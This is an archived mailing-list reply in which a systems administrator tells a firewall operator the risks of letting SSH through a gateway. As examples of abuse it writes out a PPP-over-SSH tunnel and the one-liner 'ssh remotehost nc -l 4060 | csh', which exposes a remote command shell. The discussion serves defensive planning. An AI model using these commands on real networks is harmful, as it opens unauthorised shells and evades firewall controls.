Re: SSH through firewall

[James Neal - HandiCAT <neal () ee pdx edu>]

In message <782FA6543FA5D111933D0000F86AEFA8019AA0C1 () simail5 si bosch de>you wr
ite:
> I'm thinking about allowing users in the trusted network to do ssh
> through a non-transparent application gateway firewall into an
> untrusted network.
> Do you think this is "secure"? I'm not sure because users can tunnel
> all kinds of protocols in ssh. What would be possible attacks?

Given the alternatives (ftp and telnet), I'd say SSH is a wonderful
choice.

That being said, some of "The bad" of SSH.
  o  Straight ssh-- directly from the source at ftp.cs.hut.fi-- allows
  users to forward ports from the outside machine across their secure
  channel to arbitrary ports on hosts inside your firewall.

  o  It's quite possible to run PPP over SSH.   In fact, there's a HOWTO
  about doing just that in the Linux world. It's basically just a
  # ssh remotehost pppd | pppd

  o  Related to the first two items.  There's nothing keeping a user
  from doing an "ssh remotehost nc -l 4060 | csh", to allow people to
  run shell commands by just connecting to port 4060 of the remote
  machine.

Of course, tools exist that allow one to bypass a firewall using HTTP,
telnet, and the r* services as well, so if you /do/ allow SSH through,
at least thier hax0r packets will be going over an encrypted tunnel and
not being sniffed or hujacked. :)

> Do you think this is feasible with a non-transparent firewall? Do you know 
> a firewall that is capable of this?

Urg.. Beats me.  I don't even know how SSH would function over a 
non-transparent firewall.

-James

--
James Neal <jfneal () intermedia com>
Senior Systems Administrator - Intermedia Communications
I don't speak for Intermedia, yadadada.